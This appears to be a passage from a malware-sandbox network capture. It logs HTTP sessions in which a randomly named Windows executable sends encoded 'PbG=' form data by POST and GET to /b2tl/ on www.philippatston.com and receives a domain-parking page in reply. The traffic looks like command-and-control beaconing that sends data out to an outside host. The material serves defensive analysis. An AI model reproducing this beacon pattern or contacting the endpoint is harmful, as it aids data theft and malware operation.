                                                                                                                                                    Oct 4, 2024 11:58:32.495232105 CEST1289INData Raw: 30 34 34 2d 37 2e 35 32 30 36 33 2d 33 33 2e 37 31 30 34 34 2d 33 34 2e 39 36 32 33 35 56 31 30 35 2e 39 34 33 35 31 63 30 2d 32 31 2e 37 32 39 35 31 2c 31 32 2e 31 31 37 31 39 2d 33 35 2e 33 38 31 35 37 2c 33 33 2e 34 32 39 35 2d 33 35 2e 33 38
                                                                                                                                                    Data Ascii: 044-7.52063-33.71044-34.96235V105.94351c0-21.72951,12.11719-35.38157,33.4295-35.38157,21.45363,0,33.15362,14.62776,33.15362,35.38157v7.7982C347.291,115.97606,346.45491,117.228,344.50486,117.228Zm-15.73972-13.65374c0-10.86391-5.98978-17.1343-14
                                                                                                                                                    Oct 4, 2024 11:58:32.495301008 CEST1189INData Raw: 36 2d 32 30 2e 32 33 33 2c 31 39 2e 34 31 38 31 31 2d 32 30 2e 32 33 33 73 31 39 2e 34 32 31 34 38 2c 38 2e 36 31 35 31 2c 31 39 2e 34 32 31 34 38 2c 32 30 2e 32 33 33 56 31 33 30 2e 35 31 38 43 38 31 38 2e 39 38 30 37 2c 31 34 32 2e 31 33 39 36
                                                                                                                                                    Data Ascii: 6-20.233,19.41811-20.233s19.42148,8.6151,19.42148,20.233V130.518C818.9807,142.13962,812.314,150.74765,799.55922,150.74765Zm8.69383-26.81055c0-6.66-3.00617-10.97058-8.69383-10.97058-5.68732,0-8.69382,4.31058-8.69382,10.97058V130.518c0,6.66336,3


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    6192.168.11.2049738184.73.212.51801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 11:58:35.026010036 CEST719OUTPOST /b2tl/ HTTP/1.1
                                                                                                                                                    Host: www.philippatston.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 220
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.philippatston.com
                                                                                                                                                    Referer: http://www.philippatston.com/b2tl/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 62 4b 50 2f 56 38 64 77 61 4a 4d 7a 4e 4c 4a 41 52 59 66 71 70 68 42 77 46 33 55 66 4e 46 6e 69 71 56 41 45 4d 73 4f 4f 65 4f 53 79 76 4d 56 31 47 69 70 49 33 53 33 7a 36 43 56 4a 6f 34 5a 36 6f 46 48 38 38 70 71 63 4f 51 78 37 66 53 78 64 49 30 41 6a 72 48 5a 43 6d 75 6d 68 58 58 43 6b 65 68 36 63 65 44 50 58 2b 73 4c 74 37 56 46 6d 72 6d 76 4d 78 46 38 54 49 2f 52 67 46 4e 4c 2f 38 76 30 4b 6a 4a 70 6c 4f 72 43 43 7a 70 49 59 39 77 41 47 30 70 53 52 73 4b 37 4a 2b 4b 51 54 6e 76 51 75 64 30 52 47 74 64 59 49 56 7a 37 2f 7a 33 66 63 4b 56 4f 42 51 70 6e 50 57 4c 45 79 7a 62 4c 4b 50 71 6c 4e 6c 72 78 4b 4d 4f 78 57 32 44 55 4e 36 35 49 3d
                                                                                                                                                    Data Ascii: PbG=bKP/V8dwaJMzNLJARYfqphBwF3UfNFniqVAEMsOOeOSyvMV1GipI3S3z6CVJo4Z6oFH88pqcOQx7fSxdI0AjrHZCmumhXXCkeh6ceDPX+sLt7VFmrmvMxF8TI/RgFNL/8v0KjJplOrCCzpIY9wAG0pSRsK7J+KQTnvQud0RGtdYIVz7/z3fcKVOBQpnPWLEyzbLKPqlNlrxKMOxW2DUN65I=
                                                                                                                                                    Oct 4, 2024 11:58:35.129125118 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 04 Oct 2024 09:58:35 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 33 31 35 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 61 6d 65 42 72 69 67 68 74 20 2d 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 20 64 69 76 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 [TRUNCATED]
                                                                                                                                                    Data Ascii: 315a<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]
                                                                                                                                                    Oct 4, 2024 11:58:35.129241943 CEST1289INData Raw: 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 34 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20
                                                                                                                                                    Data Ascii: min-height: 640px; background: #ffffff; border-radius: 1.5%; padding: 50px 5vw; } .main { display: flex; flex-direction: column; align-items: ce
                                                                                                                                                    Oct 4, 2024 11:58:35.129334927 CEST1289INData Raw: 20 20 20 20 20 20 20 20 3c 68 31 3e 70 68 69 6c 69 70 70 61 74 73 74 6f 6e 2e 63 6f 6d 20 69 73 20 63 6f 6d 69 6e 67 20 73 6f 6f 6e 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii: <h1>philippatston.com is coming soon</h1> </div> <div>This domain is managed at <br> <a href="//www.namebright.com" id="logo" target="_parent" alt="NameBright.com - Next Generation Domain Regi
                                                                                                                                                    Oct 4, 2024 11:58:35.129436016 CEST1289INData Raw: 2d 33 33 2e 30 31 32 33 61 37 39 2e 34 34 37 31 33 2c 37 39 2e 34 34 37 31 33 2c 30 2c 30 2c 30 2d 31 33 2e 36 34 38 37 2e 39 37 35 37 76 36 30 2e 31 37 34 34 33 61 32 2e 38 30 34 35 37 2c 32 2e 38 30 34 35 37 2c 30 2c 30 2c 31 2d 32 2e 36 34 38
                                                                                                                                                    Data Ascii: -33.0123a79.44713,79.44713,0,0,0-13.6487.9757v60.17443a2.80457,2.80457,0,0,1-2.64818,2.92778H446.56779a2.91881,2.91881,0,0,1-2.78613-2.92778V78.77935c0-1.81043,1.25192-3.34127,3.76218-4.17768,8.91384-2.92408,16.29653-4.03973,28.27274-4.03973,1
                                                                                                                                                    Oct 4, 2024 11:58:35.129534960 CEST1289INData Raw: 39 35 39 32 34 2c 35 35 33 2e 38 33 33 38 39 2c 31 37 37 2e 39 35 39 32 34 5a 4d 35 36 36 2e 37 38 35 38 2c 38 36 2e 38 35 38 38 32 61 37 36 2e 33 36 38 33 35 2c 37 36 2e 33 36 38 33 35 2c 30 2c 30 2c 30 2d 31 33 2e 33 36 39 34 34 2d 31 2e 32 35
                                                                                                                                                    Data Ascii: 95924,553.83389,177.95924ZM566.7858,86.85882a76.36835,76.36835,0,0,0-13.36944-1.25529c-11.98261,0-14.90668,8.5017-14.90668,19.92245v10.726c0,11.42072,2.92407,19.92076,14.90668,19.92076a116.75844,116.75844,0,0,0,13.36944-1.117Zm93.44986,63.2418
                                                                                                                                                    Oct 4, 2024 11:58:35.129595041 CEST1289INData Raw: 2e 37 35 36 32 36 6c 2d 31 32 2e 38 31 37 2c 32 32 2e 31 39 39 31 39 61 31 2e 32 34 35 33 37 2c 31 2e 32 34 35 33 37 2c 30 2c 30 2c 31 2d 31 2e 37 30 32 30 39 2e 34 35 38 35 38 4c 35 30 39 2e 34 35 38 2c 33 30 2e 30 30 34 31 32 61 31 2e 32 34 36
                                                                                                                                                    Data Ascii: .75626l-12.817,22.19919a1.24537,1.24537,0,0,1-1.70209.45858L509.458,30.00412a1.24616,1.24616,0,0,1-.45656-1.70176l12.814-22.19784A1.30157,1.30157,0,0,1,523.55018,5.59211Z" class="cls-2"></path><path d="M543.79932,23.73541l2.86856,4.971a1.305,1
                                                                                                                                                    Oct 4, 2024 11:58:35.129679918 CEST1289INData Raw: 37 31 2c 31 2e 32 35 37 37 31 2c 30 2c 30 2c 31 2c 2e 34 35 33 35 33 2d 31 2e 37 30 32 30 39 6c 34 2e 39 37 31 2d 32 2e 38 36 38 32 32 61 31 2e 32 34 38 39 32 2c 31 2e 32 34 38 39 32 2c 30 2c 30 2c 31 2c 31 2e 37 30 32 31 2e 34 35 38 32 34 6c 31
                                                                                                                                                    Data Ascii: 71,1.25771,0,0,1,.45353-1.70209l4.971-2.86822a1.24892,1.24892,0,0,1,1.7021.45824l12.82036,22.19616A1.306,1.306,0,0,1,490.17148,30.00412Z" class="cls-2"></path><path d="M502.683,28.189h-5.73981a1.3064,1.3064,0,0,1-1.2452-1.30947V1.24856A1.25352
                                                                                                                                                    Oct 4, 2024 11:58:35.129736900 CEST1289INData Raw: 36 2e 37 35 35 36 39 2c 31 35 32 2e 38 31 36 34 39 2c 31 34 37 2e 35 39 33 34 34 5a 4d 31 33 38 2e 31 38 38 37 33 2c 38 36 2e 35 38 31 32 35 61 38 30 2e 38 33 36 33 33 2c 38 30 2e 38 33 36 33 33 2c 30 2c 30 2c 30 2d 31 33 2e 33 37 30 37 39 2d 2e
                                                                                                                                                    Data Ascii: 6.75569,152.81649,147.59344ZM138.18873,86.58125a80.83633,80.83633,0,0,0-13.37079-.97772c-11.97958,0-14.907,8.5017-14.907,19.92245v10.726c0,11.42072,2.92744,19.92076,14.907,19.92076a81.24455,81.24455,0,0,0,13.37079-.9757Z" class="cls-2"></path>
                                                                                                                                                    Oct 4, 2024 11:58:35.129818916 CEST1289INData Raw: 30 34 34 2d 37 2e 35 32 30 36 33 2d 33 33 2e 37 31 30 34 34 2d 33 34 2e 39 36 32 33 35 56 31 30 35 2e 39 34 33 35 31 63 30 2d 32 31 2e 37 32 39 35 31 2c 31 32 2e 31 31 37 31 39 2d 33 35 2e 33 38 31 35 37 2c 33 33 2e 34 32 39 35 2d 33 35 2e 33 38
                                                                                                                                                    Data Ascii: 044-7.52063-33.71044-34.96235V105.94351c0-21.72951,12.11719-35.38157,33.4295-35.38157,21.45363,0,33.15362,14.62776,33.15362,35.38157v7.7982C347.291,115.97606,346.45491,117.228,344.50486,117.228Zm-15.73972-13.65374c0-10.86391-5.98978-17.1343-14
                                                                                                                                                    Oct 4, 2024 11:58:35.129880905 CEST1189INData Raw: 36 2d 32 30 2e 32 33 33 2c 31 39 2e 34 31 38 31 31 2d 32 30 2e 32 33 33 73 31 39 2e 34 32 31 34 38 2c 38 2e 36 31 35 31 2c 31 39 2e 34 32 31 34 38 2c 32 30 2e 32 33 33 56 31 33 30 2e 35 31 38 43 38 31 38 2e 39 38 30 37 2c 31 34 32 2e 31 33 39 36
                                                                                                                                                    Data Ascii: 6-20.233,19.41811-20.233s19.42148,8.6151,19.42148,20.233V130.518C818.9807,142.13962,812.314,150.74765,799.55922,150.74765Zm8.69383-26.81055c0-6.66-3.00617-10.97058-8.69383-10.97058-5.68732,0-8.69382,4.31058-8.69382,10.97058V130.518c0,6.66336,3


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    7192.168.11.2049739184.73.212.51801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 11:58:37.650074005 CEST6924OUTPOST /b2tl/ HTTP/1.1
                                                                                                                                                    Host: www.philippatston.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 6424
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.philippatston.com
                                                                                                                                                    Referer: http://www.philippatston.com/b2tl/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 62 4b 50 2f 56 38 64 77 61 4a 4d 7a 4e 4c 4a 41 52 59 66 71 70 68 42 77 46 33 55 66 4e 46 6e 69 71 56 41 45 4d 73 4f 4f 65 49 4b 79 76 2b 64 31 48 42 42 49 32 53 33 7a 77 69 56 45 6f 34 5a 64 6f 47 33 34 38 70 6e 70 4f 53 35 37 64 78 35 64 5a 6c 41 6a 68 48 5a 43 35 2b 6d 6b 59 33 43 39 65 68 72 58 65 44 66 58 2b 73 4c 74 37 54 68 6d 73 33 76 4d 7a 46 38 63 50 2f 51 79 54 39 4c 62 38 76 74 78 6a 4a 74 66 62 4b 69 43 77 4a 59 59 2f 69 59 47 72 5a 53 54 67 71 36 57 2b 4b 64 4e 6e 76 4d 49 64 33 4d 70 74 65 34 49 46 56 79 59 67 55 6e 61 4a 43 33 57 55 71 66 6e 56 70 56 67 39 5a 58 56 65 34 59 6d 68 75 39 46 51 64 78 2b 79 79 45 4f 68 4e 36 34 47 73 38 43 39 58 45 5a 7a 56 63 38 66 6d 38 36 34 6f 65 37 43 69 69 46 6f 4d 53 4e 58 76 70 55 68 79 64 67 35 76 77 42 53 38 6e 4f 48 56 4c 55 39 72 2f 45 79 49 55 4b 49 37 4a 77 6c 74 5a 49 6a 30 48 4f 66 4d 52 58 58 64 79 56 77 73 2f 67 55 53 6b 54 4b 31 54 76 74 4b 2f 36 53 4e 76 4d 76 52 4c 70 66 55 76 57 4e 6e 6d 30 6b 75 4f 6d 4f 35 4c 58 38 50 [TRUNCATED]
                                                                                                                                                    Data Ascii: PbG=bKP/V8dwaJMzNLJARYfqphBwF3UfNFniqVAEMsOOeIKyv+d1HBBI2S3zwiVEo4ZdoG348pnpOS57dx5dZlAjhHZC5+mkY3C9ehrXeDfX+sLt7Thms3vMzF8cP/QyT9Lb8vtxjJtfbKiCwJYY/iYGrZSTgq6W+KdNnvMId3Mpte4IFVyYgUnaJC3WUqfnVpVg9ZXVe4Ymhu9FQdx+yyEOhN64Gs8C9XEZzVc8fm864oe7CiiFoMSNXvpUhydg5vwBS8nOHVLU9r/EyIUKI7JwltZIj0HOfMRXXdyVws/gUSkTK1TvtK/6SNvMvRLpfUvWNnm0kuOmO5LX8PRFHxkAcdo5/Rirm7VpQwthOG/rrq4dm7lptax2P6wU3X35VuprQO1HAs2NcKwOgklkWG+9xhC5iYThvdgsSyER6bcfLbVGVpo2LDqSXXZcSegOvif01h3zBl4Hqyfl7P0wNiG9dyqbxh6gWKSzinTK170UljDIJP7Afz0JF3lb7fhP6XQqZhJP73ZqCyl5rV3Uu/UDkzstua2FkpTEDfsbcH637TQuXO6IjaKdwnQD/OX5N5qU072VDT42a6e2T0CzGsL1o2+1Ih51Pq9UESiUgdB8Fra2kR3U8dW6r9EMVGsZozRl6JcXCtdU4FaXRuFFmlCKoOtO0nsaXbzalfoE9YUOa5x0JExSkt4w12hd++2IL5Sf+ZrIbsY+ps3aEOD0mlE9CBRzWr28se4cgue6asCgk5T0TioiKu0shXstMqHokIEtsq19r2FGik0FpfcPKJySeG+A7zP5MTsYnehV1YEVjzrOGMcRUNRVPqy0tfzzI0R9lpm47zcsB2pkC6yijQeYD5XLuOMOcWwo1/KShqFEPDVg3xC72myCiDYaVAS+urkk8l4Aipt3TdbLZUDxurpOA54qpRGmUZfxapRDOTEnqD6DgAevzmmq3qR71pRJnP28xLfv8a1W71HwYGfye9eXunrYCb8Dw/pHj70yuEDMUlbGu9zl [TRUNCATED]
                                                                                                                                                    Oct 4, 2024 11:58:37.752475023 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 04 Oct 2024 09:58:37 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 33 31 35 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 61 6d 65 42 72 69 67 68 74 20 2d 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 20 64 69 76 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 [TRUNCATED]
                                                                                                                                                    Data Ascii: 315a<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]
                                                                                                                                                    Oct 4, 2024 11:58:37.752609015 CEST1289INData Raw: 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 34 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20
                                                                                                                                                    Data Ascii: min-height: 640px; background: #ffffff; border-radius: 1.5%; padding: 50px 5vw; } .main { display: flex; flex-direction: column; align-items: ce
                                                                                                                                                    Oct 4, 2024 11:58:37.752722025 CEST1289INData Raw: 20 20 20 20 20 20 20 20 3c 68 31 3e 70 68 69 6c 69 70 70 61 74 73 74 6f 6e 2e 63 6f 6d 20 69 73 20 63 6f 6d 69 6e 67 20 73 6f 6f 6e 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii: <h1>philippatston.com is coming soon</h1> </div> <div>This domain is managed at <br> <a href="//www.namebright.com" id="logo" target="_parent" alt="NameBright.com - Next Generation Domain Regi
                                                                                                                                                    Oct 4, 2024 11:58:37.752875090 CEST1289INData Raw: 2d 33 33 2e 30 31 32 33 61 37 39 2e 34 34 37 31 33 2c 37 39 2e 34 34 37 31 33 2c 30 2c 30 2c 30 2d 31 33 2e 36 34 38 37 2e 39 37 35 37 76 36 30 2e 31 37 34 34 33 61 32 2e 38 30 34 35 37 2c 32 2e 38 30 34 35 37 2c 30 2c 30 2c 31 2d 32 2e 36 34 38
                                                                                                                                                    Data Ascii: -33.0123a79.44713,79.44713,0,0,0-13.6487.9757v60.17443a2.80457,2.80457,0,0,1-2.64818,2.92778H446.56779a2.91881,2.91881,0,0,1-2.78613-2.92778V78.77935c0-1.81043,1.25192-3.34127,3.76218-4.17768,8.91384-2.92408,16.29653-4.03973,28.27274-4.03973,1
                                                                                                                                                    Oct 4, 2024 11:58:37.752975941 CEST1289INData Raw: 39 35 39 32 34 2c 35 35 33 2e 38 33 33 38 39 2c 31 37 37 2e 39 35 39 32 34 5a 4d 35 36 36 2e 37 38 35 38 2c 38 36 2e 38 35 38 38 32 61 37 36 2e 33 36 38 33 35 2c 37 36 2e 33 36 38 33 35 2c 30 2c 30 2c 30 2d 31 33 2e 33 36 39 34 34 2d 31 2e 32 35
                                                                                                                                                    Data Ascii: 95924,553.83389,177.95924ZM566.7858,86.85882a76.36835,76.36835,0,0,0-13.36944-1.25529c-11.98261,0-14.90668,8.5017-14.90668,19.92245v10.726c0,11.42072,2.92407,19.92076,14.90668,19.92076a116.75844,116.75844,0,0,0,13.36944-1.117Zm93.44986,63.2418
                                                                                                                                                    Oct 4, 2024 11:58:37.753082991 CEST1289INData Raw: 2e 37 35 36 32 36 6c 2d 31 32 2e 38 31 37 2c 32 32 2e 31 39 39 31 39 61 31 2e 32 34 35 33 37 2c 31 2e 32 34 35 33 37 2c 30 2c 30 2c 31 2d 31 2e 37 30 32 30 39 2e 34 35 38 35 38 4c 35 30 39 2e 34 35 38 2c 33 30 2e 30 30 34 31 32 61 31 2e 32 34 36
                                                                                                                                                    Data Ascii: .75626l-12.817,22.19919a1.24537,1.24537,0,0,1-1.70209.45858L509.458,30.00412a1.24616,1.24616,0,0,1-.45656-1.70176l12.814-22.19784A1.30157,1.30157,0,0,1,523.55018,5.59211Z" class="cls-2"></path><path d="M543.79932,23.73541l2.86856,4.971a1.305,1
                                                                                                                                                    Oct 4, 2024 11:58:37.753196001 CEST1289INData Raw: 37 31 2c 31 2e 32 35 37 37 31 2c 30 2c 30 2c 31 2c 2e 34 35 33 35 33 2d 31 2e 37 30 32 30 39 6c 34 2e 39 37 31 2d 32 2e 38 36 38 32 32 61 31 2e 32 34 38 39 32 2c 31 2e 32 34 38 39 32 2c 30 2c 30 2c 31 2c 31 2e 37 30 32 31 2e 34 35 38 32 34 6c 31
                                                                                                                                                    Data Ascii: 71,1.25771,0,0,1,.45353-1.70209l4.971-2.86822a1.24892,1.24892,0,0,1,1.7021.45824l12.82036,22.19616A1.306,1.306,0,0,1,490.17148,30.00412Z" class="cls-2"></path><path d="M502.683,28.189h-5.73981a1.3064,1.3064,0,0,1-1.2452-1.30947V1.24856A1.25352
                                                                                                                                                    Oct 4, 2024 11:58:37.753288984 CEST1289INData Raw: 36 2e 37 35 35 36 39 2c 31 35 32 2e 38 31 36 34 39 2c 31 34 37 2e 35 39 33 34 34 5a 4d 31 33 38 2e 31 38 38 37 33 2c 38 36 2e 35 38 31 32 35 61 38 30 2e 38 33 36 33 33 2c 38 30 2e 38 33 36 33 33 2c 30 2c 30 2c 30 2d 31 33 2e 33 37 30 37 39 2d 2e
                                                                                                                                                    Data Ascii: 6.75569,152.81649,147.59344ZM138.18873,86.58125a80.83633,80.83633,0,0,0-13.37079-.97772c-11.97958,0-14.907,8.5017-14.907,19.92245v10.726c0,11.42072,2.92744,19.92076,14.907,19.92076a81.24455,81.24455,0,0,0,13.37079-.9757Z" class="cls-2"></path>
                                                                                                                                                    Oct 4, 2024 11:58:37.753356934 CEST1289INData Raw: 30 34 34 2d 37 2e 35 32 30 36 33 2d 33 33 2e 37 31 30 34 34 2d 33 34 2e 39 36 32 33 35 56 31 30 35 2e 39 34 33 35 31 63 30 2d 32 31 2e 37 32 39 35 31 2c 31 32 2e 31 31 37 31 39 2d 33 35 2e 33 38 31 35 37 2c 33 33 2e 34 32 39 35 2d 33 35 2e 33 38
                                                                                                                                                    Data Ascii: 044-7.52063-33.71044-34.96235V105.94351c0-21.72951,12.11719-35.38157,33.4295-35.38157,21.45363,0,33.15362,14.62776,33.15362,35.38157v7.7982C347.291,115.97606,346.45491,117.228,344.50486,117.228Zm-15.73972-13.65374c0-10.86391-5.98978-17.1343-14
                                                                                                                                                    Oct 4, 2024 11:58:37.753426075 CEST1189INData Raw: 36 2d 32 30 2e 32 33 33 2c 31 39 2e 34 31 38 31 31 2d 32 30 2e 32 33 33 73 31 39 2e 34 32 31 34 38 2c 38 2e 36 31 35 31 2c 31 39 2e 34 32 31 34 38 2c 32 30 2e 32 33 33 56 31 33 30 2e 35 31 38 43 38 31 38 2e 39 38 30 37 2c 31 34 32 2e 31 33 39 36
                                                                                                                                                    Data Ascii: 6-20.233,19.41811-20.233s19.42148,8.6151,19.42148,20.233V130.518C818.9807,142.13962,812.314,150.74765,799.55922,150.74765Zm8.69383-26.81055c0-6.66-3.00617-10.97058-8.69383-10.97058-5.68732,0-8.69382,4.31058-8.69382,10.97058V130.518c0,6.66336,3


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    8192.168.11.2049740184.73.212.51801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 11:58:40.277545929 CEST431OUTGET /b2tl/?PbG=WInfWL97QekdPalSc67opDsfGENLX06TmGNVEv6Geo+doMJXHAo9/Rqdqw5O1dkupHqa0ILlPiguACBnPWEgxg52+Lm0TB3eeiGyfSWC0M759S5RsmGy+TM=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.philippatston.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Oct 4, 2024 11:58:40.381834984 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 04 Oct 2024 09:58:40 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
